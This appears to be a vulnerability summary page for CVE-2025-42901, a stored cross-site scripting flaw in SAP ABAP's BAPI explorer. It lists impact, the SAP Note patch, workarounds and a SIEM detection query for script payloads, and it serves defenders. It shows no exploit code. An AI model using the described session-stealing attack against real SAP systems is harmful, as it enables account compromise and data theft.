CVE-2025-42901
📋 TL;DR
CVE-2025-42901 is a stored cross-site scripting (XSS) vulnerability in SAP Application Server for ABAP's BAPI explorer. Authenticated attackers can inject malicious JavaScript that executes in other users' browsers when they access the affected functionality. This affects SAP ABAP systems with vulnerable versions of the BAPI explorer component.
💻 Affected Systems
- SAP Application Server for ABAP
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
An authenticated malicious user could steal session cookies, perform actions as other users, or redirect users to malicious sites, potentially leading to account compromise or data theft.
Likely Case
An authenticated attacker with basic privileges could perform limited session hijacking or defacement within the BAPI explorer interface.
If Mitigated
With proper input validation and output encoding, the malicious payloads would be rendered harmless as text rather than executable code.
🎯 Exploit Status
Requires authenticated access and knowledge of BAPI explorer functionality
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Apply SAP Note 3652788
Vendor Advisory: https://me.sap.com/notes/3652788
Restart Required: No
Instructions:
1. Download SAP Note 3652788 from SAP Support Portal. 2. Apply the correction instructions provided in the note. 3. Verify the fix by testing BAPI explorer functionality.
🔧 Temporary Workarounds
Disable BAPI Explorer Access
allRestrict or disable access to the BAPI explorer functionality for non-administrative users
Use SAP authorization profiles to restrict S_DEVELOP access
Implement Content Security Policy
allAdd Content-Security-Policy headers to restrict script execution
Configure HTTP headers to restrict inline scripts and external sources
🧯 If You Can't Patch
- Implement strict input validation and output encoding for all user-supplied data in BAPI explorer
- Monitor and audit BAPI explorer usage for suspicious activity
🔍 How to Verify
Check if Vulnerable:
Check if your SAP system version matches those listed in SAP Note 3652788 and test for XSS in BAPI explorer input fieldsCheck Version:
Execute transaction SM51 to check SAP kernel and system versionVerify Fix Applied:
After applying SAP Note 3652788, test BAPI explorer functionality with XSS payloads to confirm they are properly sanitized📡 Detection & Monitoring
Log Indicators:
- Unusual BAPI explorer usage patterns
- Multiple failed XSS attempts in application logs
Network Indicators:
- Suspicious JavaScript payloads in HTTP requests to BAPI explorer endpoints
SIEM Query:
source="sap_abap_logs" AND (message="*BAPI*" AND message="*script*" OR message="*javascript*")